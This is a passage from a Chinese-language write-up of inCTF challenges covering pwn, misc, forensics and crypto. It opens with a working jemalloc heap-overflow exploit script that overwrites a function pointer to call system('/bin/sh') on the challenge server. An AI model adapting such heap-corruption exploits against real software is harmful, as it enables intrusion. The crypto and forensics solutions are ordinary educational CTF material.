jemalloc的分配机制, 其实run并不会指定顺序, 只是malloc触发bin初始化获取到一个run就拿来用, 因此最开始三次malloc, 分别0x10, 0x40, 0x50, 已经被分配了,后续0x18(其实是0x20同一个run)会占一个, 如果出现新的大小就会使用新的未使用run补上,

另外我们看下具体p_func的位置:

inctf解题paper

前面标记的部分是run结构体, 后续0x60开始是第一个region, 也就是p_func,

我们的目标就是覆写这个位置,
因为我们目标是修改0x50的p_func, 如果在前面的0x40处向后覆写, 0x40最多写到0x8000-1的位置, p_func在0x8060,
而利用合并的话0x40由两个0x20合并, 则能溢出范围是0x8000-0x8020, 可以参考前面p_func的内存数据, 这0x20正好是run结构体, 于是我们可以尝试修改0x50的run结构体,

而且jemalloc的分配机制, 在run中, 就是靠这个结构体内数据+run基地址偏移找到region的, 我们应该可以直接修改为p_func未分配出来或者已经被free的状态,

这里补一句, 最开始我尝试在某次调用free修改参数为p_func指针, 并获取到free运行后这个run的状态, 但是因为此时没有在使用region, run也被回收, 他的run->magic位置为null, 也就是整个run被认为是未初始化状态, 但是同时bin(0x50)->runcur=null,

如果我们这样利用, 因为bin(0x50)->runcur中仍然是这个run, 此时就会抛出错误,

于是我们设置run->magic=magic, 然后其他位置和free后一致,

payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)

这时候会认为, run内的region都未使用, 通过偏移查找到p_func位置作为第一个被取出的region返回,

注意这个bin, 相对堆地址不变, 泄漏堆地址以后可以得到,

因为溢出使用的是0x20的region, 但是chunk结构体本身是0x18, 也在0x20的run中, 因此这个run中的排布是chunk-name-chunk-name-chunk-name, 这样溢出0x20字节也只是将name2后续的chunk写入到run结构体中,

这里我们利用free不会清空的机制,
首先malloc(0x20)+free, 使内存排布为chunkF-nameF-chunkF-nameF-chunkF-nameF
然后我们malloc(0x60)// 或者size只要不是0x20即可, 这样可以打乱原本的布局, 然后再次malloc(0x20)用于合并, 现在是: chunk-chunk-name-nameF-chunkF-nameF,

具体思路
首先泄漏pie和堆地址,

然后不断malloc(0x40), 留下0x7000这个run中的最后一个region,

然后合并两个0x20的人物,(会调用realloc(0x40)这个只是malloc+free而已), 此时获取到0x7000这个run中的最后一个region, 溢出0x20, 修改0x8000-0x8020, 即0x8000这个run的run结构体, 修改为没有region被使用的状态,

我们将/bin/sh\x00字符串写入到一个堆块中, 通过堆基地址可以找到, 当作参数1, pie泄漏, system地址使用plt表地址即可,

malloc(0x50), 从0x8000run中取出第一个region, 此时和p_func重合, 我们写入flat(system, binsh), 然后退出, 在程序最后激活system(binsh)即可.

from pwn import * 

context.arch='amd64'
# context.log_level = 'debug'

def add(size, name):
	sla(">> ", '1')
	sla("nter the size : ", str(size))
	sla("nter name : ", name)

def battle(id):
	sla(">> ", '2')
	sla("nter enemy id : ", str(id))

def merga(id1, id2):
	sla(">> ", '3')
	sla("id 1:", str(id1))
	sla('id 2:', str(id2))

def kill(idx):
	for i in range(7):
		battle(idx)
	sl('1')




def exp():
	sl("b"* 0x20)
	battle(-7)
	ru("Starting battle with ")
	leak = u64(re(6, 2).ljust(8, b'\x00'))
	PIE = leak - 0x4008
	print("pie: ")
	print(hex(PIE))
	slog['PIE'] = PIE 
	sl('2')


	add(0x60, '1' * 0x20) # 0
	add(0x60, '1' * 0x20) # 1

	kill(0)
	kill(1)

	add(0x20, '') # 2 
	battle(2)
	ru("Starting battle with ")
	leak = u64(re(6, 2).ljust(8, b'\x00'))
	heap = leak - 0xb00a
	print("pie: ")
	print(hex(heap))
	slog['heap'] = heap

	bin = 0x800d70 + heap 
	slog['bin'] = bin 

	add(0x20, 'a' * 0x20) # 3

	for i in range(6):
		battle(2)
	sl('1')

	kill(3)

	# add(0x20, '1' * 0x20) # 4 
	# add(0x20, '2' * 0x20) # 5 


	for i in range (61):
		add(0x40, 'a'*0x40)

	# 0xa7e0 0xa800 
	add(0x20, '/bin/sh\x00') # 65 
	binsh = heap + 0xa800 

	# 0x820
	add(0x20, '2' * 0x20) # 66 
	# add(0x20, '3' * 0x20) # 67 
	payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)
	# paylaod = 'a' * 0x20 
	add(0x20, payload) # 67 
	add(0x20, '4' * 0x20) # 68 
	add(0x20, '5' * 0x20) # 69
	add(0x20, '6' * 0x20) # 70

	kill(66)
	kill(67)
	kill(68)
	kill(69)

	add(0x60, 'z' * 0x60) # 71

	add(0x20, '1' * 0x20) # 72 index2
	merga(70, 72)

	system = PIE + 0x000000000001170
	paylaod = flat(system , binsh)
	add(0x50, paylaod) # p_func

	sl('4')




local = int(sys.argv[1])
slog = {'name' : 111}

if local:
    cn = process('./bin')
else:
    cn = remote("pwn.challenge.bi0s.in", 1230)

re  = lambda m, t : cn.recv(numb=m, timeout=t)
recv= lambda      : cn.recv()
ru  = lambda x    : cn.recvuntil(x)
rl  = lambda      : cn.recvline()
sd  = lambda x    : cn.send(x)
sl  = lambda x    : cn.sendline(x)
ia  = lambda      : cn.interactive()
sla = lambda a, b : cn.sendlineafter(a, b)
sa  = lambda a, b : cn.sendafter(a, b)
sll = lambda x    : cn.sendlineafter(':', x)
# after a, send b;

def slog_show():
    for i in slog:
        success(i + ' ==> ' + hex(slog[i]))

exp()

slog_show()
cn.interactive()

misc

alpha pie

nc misc.challenge.bi0s.in 1337
inctf解题paper
每回合会给一个方阵,对左侧字符进行上下左右的平移,在一定次数内是左边方阵等于右边,
移动指令:from.x,from.y,to.x,to.y
(示例:图中t向左一格的指令为:0,3,0,2)
从0开始,上下为x,左右为y
最少拐弯问题

from pwn import *
import copy

context.log_level = 'debug'
p = remote("misc.challenge.bi0s.in", 1337)
p.sendlineafter(b"Press 'y' to start: ", b"y")


def recv_level():
    p.recvuntil(b"Max number of moves allowed:")
    max_moves = int(p.recvline(), 10)
    p.recvline()
    mat1 = []
    mat2 = []
    while True:
        data = p.recvline()
        data = data.strip()
        data = data.replace(b" ", b"")
        if b'+-------' in data:
            break
        cords = [c for c in data.split(b"|") if c != b""]
        baseline = len(cords) // 2
        mat1.append(cords[0:baseline])
        mat2.append(cords[baseline:])
    return mat1, mat2, max_moves


def get_fucks(mat):
    return [(x, y) for y in range(len(mat)) for x in range(len(mat[y])) if mat[y][x] != b'0']


def make_hist(start_p, end_p, mat,hist):
    sym = mat[start_p[1]][start_p[0]]
    if start_p[0] == end_p[0]: # y diffs
        start_pos = min(start_p[1], end_p[1])
        end_pos =  max(start_p[1], end_p[1])
        for i in range(start_pos, end_pos):
            hist[i][start_p[0]].append(sym)
        return

    if start_p[1] == start_p[1]:
        start_pos = min(start_p[0], end_p[0])
        end_pos =  max(start_p[0], end_p[0])
        for i in range(start_pos, end_pos):
            hist[start_p[1]][i].append(sym)
        return
    raise

def gen_next(mat1, targetPos, history, curPoint):
    x = curPoint[0]
    y = curPoint[1]
    assert mat1[y][x] != b'0'

    target = targetPos[mat1[y][x]]
    if target  == (x, y):
        return []
    # find mat1[y][x] in mat2


    saved_x, saved_y = x, y
    next_dir = []

    # left
    while x - 1 >= 0 and mat1[y][x] not in history[y][x - 1] and mat1[y][x - 1] == b'0' and x - 1 >= target[0]:
        x -= 1
    if saved_x != x:
        next_dir.append((x, y))
    x, y = saved_x, saved_y

    # right
    while x + 1 < len(mat1[0]) and mat1[y][x] not in history[y][x + 1] and mat1[y][x + 1] == b'0' and x + 1 <= target[0]:
        x += 1
    if saved_x != x:
        next_dir.append((x, y))
    x, y = saved_x, saved_y

    # up
    while y - 1 >= 0 and mat1[y][x] not in history[y - 1][x] and mat1[y - 1][x] == b'0' and  y - 1 >= target[1]:
        y -= 1
    if saved_y != y: 
        next_dir.append((x, y))

    x, y = saved_x, saved_y
    
    # down
    while y + 1 < len(mat1) and mat1[y][x] not in history[y + 1][x] and mat1[y + 1][x] == b'0' and y + 1 <= target[1]:
        y += 1
    if saved_y != y: 
        next_dir.append((x, y))
    return next_dir


def printMat(mat):
    for y in mat:
        for x in y:
            print(x.decode('ascii'), end=" ")
        print("")
    print("=============")


def solve():
    mat1, mat2, max1 = recv_level()

    targetPos = dict()

    for y in range(len(mat2)):
        for x in range(len(mat2[0])):
            if mat2[y][x] != b'0':
                targetPos[mat2[y][x]] = (x, y)
    

    def dfs(mat1, history, track):
        #printMat(mat1)
        if mat1 == mat2:
            print("find:", track)
            # check valid
            if len(track) <= max1:
                solved = track
                print("real find:", track)
                return track
            else:
                return None
        if len(track) > max1:
            return None

        for f in get_fucks(mat1):
            all_next = gen_next(mat1, targetPos, history, f)
            
            for the_next in all_next:
                new_mat1 = copy.deepcopy(mat1)
                new_hist = copy.deepcopy(history)
                new_track = copy.deepcopy(track)

                make_hist(f, the_next, mat1, new_hist)
                #new_hist[f[1]][f[0]].append(new_mat1[f[1]][f[0]])
                
                new_mat1[the_next[1]][the_next[0]] = new_mat1[f[1]][f[0]]
                new_mat1[f[1]][f[0]] = b'0'
                new_track.append((f, the_next))
                res = dfs(new_mat1, new_hist, new_track)
                if res != None:
                    return res 

    hist = [[[] for i in range(len(mat1))] for j in range(len(mat1[0]))]
    solved = dfs(mat1, hist, [])
    if solved != None:
        for way in solved:
            fx = way[0][1]
            fy = way[0][0]
            tx = way[1][1]
            ty = way[1][0]
            tt = "%d,%d,%d,%d" % ((fx, fy, tx, ty))
            p.sendlineafter(",to-y-cord ' : ", tt)

for i in range(9):
    solve()
p.interactive()

forensics

Ermittlung

进程是msimn.exe, outlook的程序,
进程名: Outlook_Express
时间: 2020-07-27 12:26:17

参考文章 其中第19条表示相关信息储存在NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\UnreadMail, 我尝试在文件中搜索NTUSER.DAT, 成功找到几个, 然后导出文件.
之后找到了这个文章简单讲述了如何分析NTUSER.DAT文件, 其实这个是个windows注册表文件, 使用Registry Explorer可以分析,
然后我们得到未读信息和版本号,

未读信息数量: 4
inctf解题paper

版本号: 6.0.2900.5512
inctf解题paper

flag: inctf{Outlook_Express_27-07-2020_12:26:17_4_6.0.2900.5512}

crypto

gold_digger

def encrypt(msg, N,x):
    msg, ciphertexts = bin(bytes_to_long(msg))[2:], []
    for i in msg:
        while True:
            r = random.randint(1, N)
            if gcd(r, N) == 1:
                bin_r = bin(r)[2:]
                c = (pow(x, int(bin_r + i, 2), N) * r ** 2) % N
                ciphertexts.append(c)
                break
    return ciphertexts

这里可以写成

c = (pow(x, int(bin_r + i, 2), N) * r ** 2) % N

如果 flag i位 为 1 ,r+1 则为奇数

否则 位偶数

通过这个条件,可以利用雅可比符号计算二次剩余的存在性来判断flag第i位的值

solution

from Crypto.Util.number import *
import gmpy2
from data import ct
N = 76412591878589062218268295214588155113848214591159651706606899098148826991765244918845852654692521227796262805383954625826786269714537214851151966113019
x = 72734035256658283650328188108558881627733900313945552572062845397682235996608686482192322284661734065398540319882182671287066089407681557887237904496283

plaintext = ''

for line in ct:
    if gmpy2.jacobi(line,N) == -1:
        plaintext += '1'
    else:
        plaintext += '0'
print(long_to_bytes(int(plaintext,2)))
# inctf{n0w_I_4in7_73ll1ng_u_4_g0ldd1gg3r}

Lost Baggag

格解背包

sagemath lattice reduction code:

import pickle
data = pickle.load(open('enc.pickle', 'rb'))
cip = data['cip']
pbkey = data['pbkey']
print(len(pbkey))


S = cip
M = pbkey

n = len(M)
L = matrix.zero(n + 1)

for row, x in enumerate(M):
    L[row, row] = 2
    L[row, -1] = x

L[-1, :] = 1
L[-1, -1] = S
f = open('LLLdata.txt','a+')
res = L.LLL()
for i in range(144):
    ans = list(res[i])
    
    f.write(str(ans)+'\n')
    print(ans)

用以下矩阵构造

将LLLdata.txt里面每一行向量都拿出来试一遍就得到flag了

from Crypto.Util.number import *
ans = [-1, 1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 1, -1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, -1, 1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, -1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, -1, 1, -1, -1, 1, 1, 1, -1, -1, 1, 1, -1, -1, -1, 1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1, 1]


flag = ''
for i in ans:
    if(i == -1):
        flag+='1'
    else:
        flag+='0'
msg = int(flag[::-1],2)
print(long_to_bytes(msg))
flag = ''
for i in ans:
    if(i == -1):
        flag+='0'
    else:
        flag+='1'
msg = int(flag[::-1],2)
print(long_to_bytes(msg))
# inctf{wr5_m4_b4g?}

Right Now Generator

主要难度在逆向上面

	def wrap(self, pr=True):
		hsze = self.sze//2
		for i in range(self.sze):
			r1 = self.seed[i]
			r2 = self.seed[(i+hsze)%self.sze]
			self.seed[i] = ((r1^self.pad)*r2)%self.mod
		self.ctr = 0

	def next(self):
		a, b, c, d = (self.seed[self.ctr^i] for i in range(4))
		mod = self.mod
		k = 1 if self.ctr%2 else 2
		a, b, c, d = (k*a-b)%mod, (b-c)%mod, (c-d)%mod, (d-a)%mod
		self.ctr += 1
		if self.ctr==64:
			self.wrap(pr=False)
		return a

主要难度在上面两个函数的逆向上面


可以轻易地写出反函数

由a序列得到seed序列的:

def from_aa_get_seed(aa):
	seed=[]
	for i in range(0,63,4):
		tmp = aa[i:i+4]
		a1,a2,a3,a4 = tmp
		s0 = (a1+a2)%mod
		s1 = (2*a2+a1)%mod
		s2 = (a3+a4)%mod
		s3 = (2*a4+a3)%mod
		seed = seed + [s0,s1,s2,s3]
	return seed

inv_wrap:

def inv_wrap(seed):
	
	for i in range(32):
		
		r2 = seed[i]
		r1 = ((seed[i+32]*libnum.invmod(r2,mod))%mod)^pad
		seed[i+32]=r1
	for i in range(32):
		r2 = seed[i+32]
		r1 = ((seed[i]*libnum.invmod(r2,mod))%mod)^pad
		seed[i] = r1
	return seed

组合到一起就完事

Solution


import random, hashlib, os, gmpy2, pickle
import libnum
from libnum.modular import invmod
from Crypto.Util.number import *

from Crypto.Cipher import AES

# -----------------------------------

pad = 0xDEADC0DE
sze = 64
mod = 18446744073709551629

def inv_wrap(seed):
	
	for i in range(32):
		
		r2 = seed[i]
		r1 = ((seed[i+32]*libnum.invmod(r2,mod))%mod)^pad
		seed[i+32]=r1
	for i in range(32):
		r2 = seed[i+32]
		r1 = ((seed[i]*libnum.invmod(r2,mod))%mod)^pad
		seed[i] = r1
	return seed

def from_aa_get_seed(aa):
	seed=[]
	for i in range(0,63,4):
		tmp = aa[i:i+4]
		
		a1,a2,a3,a4 = tmp
		s0 = (a1+a2)%mod
		s1 = (2*a2+a1)%mod
		s2 = (a3+a4)%mod
		s3 = (2*a4+a3)%mod
		seed = seed + [s0,s1,s2,s3]
	return seed
def from_leak_get_aa(leak):
	aa =[]
	for i in range(0,1024,16):
		
		tmp  =leak[i:i+16]
		s = bytes.fromhex(tmp)
		tmp = bytes_to_long(s)
		
		aa.append(tmp)
	return aa
def next(seed1,i):
	ctr = i
	a, b, c, d = (seed1[ctr^i] for i in range(4))
	mod = 18446744073709551629
	k = 1 if ctr%2 else 2 # 1 和 2 交替出现,可控
	a, b, c, d = (k*a-b)%mod, (b-c)%mod, (c-d)%mod, (d-a)%mod
	
	return a
enc = {'cip': '71d39d37d3c03e08b82d81ae3b4be658e2dbdaee6a73d73a3e88271f423db30f0422d4fb9475ceef281a746afa86eaee', 'iv': 'cbf411655acfd7f670968ccf44d74e05', 'leak': '3aeba43302ab9ad0df898103fc0223be23f5ec10f62ad48744c2ec06bc4ac9b2290aff5f5d17fc2ff2a1115e657ddced0f12238ca12b076bf85fed0ce621202d159c014907e39ba7373ada78a4dea3a76bfb9ff09a8f10705cd95a47edd743fde25f32ab545bf98bba1344bed511b0c095ddede11b4a35bc02acb34d3aef46c56bfc9b668c82c0d3da76307dd87016e1a7df478cdefb98d4fe991088f478f24390fac3d4f0d0673d2801f37df421ab17cb72af64a8b21ebf9d73c3ef35a8bd5fe98c62a910ef8b859b86a58bf670fe544266bc37a36d3828e7397bac0b817f41522e76a68661b3e9952ed3d2eb7846b2f9cd2c1cc44eda2ac536eb826ce922afaa4c7d61ff3db9023cf2fff8fb34791954fbb1541f043fe26e92fb79f119fbe175bd1b551dd1225275a457580bef4301505f474060f39caad6d3172f17a9a21f68e66b59a13e817b0201dbdbcc1e6c1d80ab2e8d38f7f0a62d0bb3577da845643273b1743f5aac064422bdbd85358f6da726f9114c5553432d4f4e2f43f997975add7ea3b6a56b689ff84f7635815879e28d8c7421b979449f5bccb29cce745862610af8c99379c60e1205d5e1eda9d2f5243d4da4325ac142bd196d1777bd2d4f61eb355b7fca3e16295d05e8a21e75f010272ce159afb49fa3d4b97bd242304e34599f7bc8edf5b4430bb42b12437b7c27583d303043311afd56fae70a7d6b'}

leak  = enc['leak']
aa = from_leak_get_aa(leak)
seed = from_aa_get_seed(aa)
seed_prev = inv_wrap(seed)
out1 = ''.join([format(next(seed_prev,i), '016x') for i in range(64)])
key = bytes.fromhex(out1)
key = hashlib.sha256(key).digest()[:16]
cip = enc['cip']
iv = enc['iv']
cip = bytes.fromhex(cip)
iv = bytes.fromhex(iv)
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(cip)
print(flag)
# b'inctf{S1mpl3_RN65_r_7h3_b35t!_b35e496b4d570c16}\x01'

Eazy Xchange

给gen_key稍微变换一下

def gen_key(G, pvkey):
	G = sum([i*G for i in pvkey])
	return G
def gen_key(G, pvkey):
	tmp = sum([i for i in pvkey])
	return G*tmp

这里tmp很小

def gen_bob_key(EC, G):
	bkey = os.urandom(4)
	B = gen_key(G, bkey)
	return B, bkey

由gen_bob_key可知


稍微爆破一下得到flag

import os, hashlib, pickle
from tqdm import tqdm
# -----------------------------------
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
a = p - 3
b = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
EC = EllipticCurve(GF(p), [a, b])
G = EC.gens()[0] # 固定的点

def decrypt(cip, key,iv):
    key = hashlib.sha256(str(key).encode()).digest()[:16]

    cipher = AES.new(key, AES.MODE_CBC, iv)
    return cipher.decrypt(cip)

data = {'cip': '9dcc2c462c7cd13d7e37898620c6cdf12c4d7b2f36673f55c0642e1e2128793676d985970f0b5024721afaaf02f2f045', 'iv': 'cbd6c57eac650a687a7c938d90e382aa', 'G': '(38764697308493389993546589472262590866107682806682771450105924429005322578970 : 112597290425349970187225006888153254041358622497584092630146848080355182942680 : 1)'}
FLAG = data['cip']
iv = data['iv']
FLAG = bytes.fromhex(FLAG)
iv = bytes.fromhex(iv)
x = 38764697308493389993546589472262590866107682806682771450105924429005322578970
y = 112597290425349970187225006888153254041358622497584092630146848080355182942680
G = EC(x,y)
print(G)

SS = G
for i in tqdm(range(2,1024*1024)):
    
    SS = SS+G
    msg = decrypt(FLAG, SS.xy()[0],iv)
    if(b'inctf' in msg):
        print(msg)
        break
# inctf{w0w_DH_15_5o_c00l!_3c9cdad74c27d1fc}

Encrypted Operations

这个太哈人了 全是cpp

审了一天

发现印度老哥这个vector的理解和我不一样,缝缝补补终于搞出来了

反正这个题应该很难有复现环境了

(其实能把homomorphic_system复写一遍应该还是可以的?放在docker里面还是比较好部署的)

就干脆简单说一下三个部分的思路好了🐫

prat1

for (int x = 0; x < 20; x++)
    {
        for (int y = 0; y < 20; y++)
        {
            m[x][y] = ++val;
        }
    }

    int d = 20;
    int r = 3;
    int c = 3;
for (int i = 0; i < 18; i++)
    {
        for (int j = 0; j < 18; j++)
        {
            for (int p = 0; p < 3; p++)
            {
                for (int q = 0; q < 3; q++)
                {
                    mat.push_back(m[i + p][j + q]);
                }
            }
        }
    }

    for (int j = 0; j < int(mat.size()); j += 9)
    {
        v.push_back(slice(mat, j, j + 9));//切片矩阵化
    }

    idx = Genrand(0, v.size() - 1);
    vector<int64_t> temp1(begin(v[idx]), end(v[idx]));
    vector<int64_t> mvector = temp1;

    sum1 = accumulate(mvector.begin(), mvector.end(), 0);//随机先去一个切片求和

    FheEncrypt(mvector);

    EncryptedOperations();

    vector<int64_t> p = FheDecrypt();

    if (sum1 == 0)
    {
        cout << "\n\nCHALLENGE CORRUPTED!!!!";
        exit(0);
    }

    if (p[0] == sum1)
        cout << "\n\nYou got all the encrypted operations right! Great!!\n\nNow on to the next\n\n";
    else
        exit(0);

拿导外面跑一下发现其实就是对切片求和,由于temp1里面本质上是个等差数列,找一下规律就可以了

part2同理

payload1

9 0 0 0
*
1
y

189 0 0 0
+
1
n

189 0 0 0
+
1
n
+

20 0 0 0
*
1
y

830 0 0 0
+
1
n

level2 对 p1 p2 取反使其抵消掉numVec里面除了m1[row[2]]以外的所有向量

在 userinp生成处,往后多选了一位,这个操作可以在EncryptedOperations中对m1[row[2]]右移一位抵消掉影响,最有一位并不会消失,而是会将vector的长度扩展一位

p = vector<int64_t>(p.begin(), p.begin() + 5 + 1);

exp

from pwn import *
from pwnlib.util.iters import random_permutation
#  crypto.challenge.bi0s.in 1221

data = """9 0 0 0
*
1
y

189 0 0 0
+
1
n

189 0 0 0
+
1
n
+

20 0 0 0
*
1
y

830 0 0 0
+
1
n

0 0 0 0 0
>
1
n

-1 -1 -1 -1 -1
*
1
n

-1 -1 -1 -1 -1
*
1
n

"""
io = remote('crypto.challenge.bi0s.in',1221)
io.sendline(data)
io.recvuntil('flag')
io.recvuntil('flag')
buf = io.recv(2048)
if(b'inctf' in buf):
    print(buf)
    exit(0)
# inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}

shell

❯❯ inctf  22:18 python3 -u "c:\Users\16953\Desktop\inctf\Encrypted Operations\src\exp.py"
[x] Opening connection to crypto.challenge.bi0s.in on port 1221
[x] Opening connection to crypto.challenge.bi0s.in on port 1221: Trying 34.106.211.122
[+] Opening connection to crypto.challenge.bi0s.in on port 1221: Done
b': inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}\n\n\nThankyou for using the srvice! Sucessfully performed all operatoions!!\n\n\nExiting!!'
[*] Closed connection to crypto.challenge.bi0s.in port 1221

Challenge-attachment

network-pentest

Listen

def listen():
    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    skt.bind(('172.30.0.14',31337))
    skt.listen(1)
    handle,addr=skt.accept()
    print(handle.recv(2048).decode())
    print(handle.recv(2048).decode())
    print(handle.recv(2048).decode())
    print(handle.recv(2048).decode())
listen()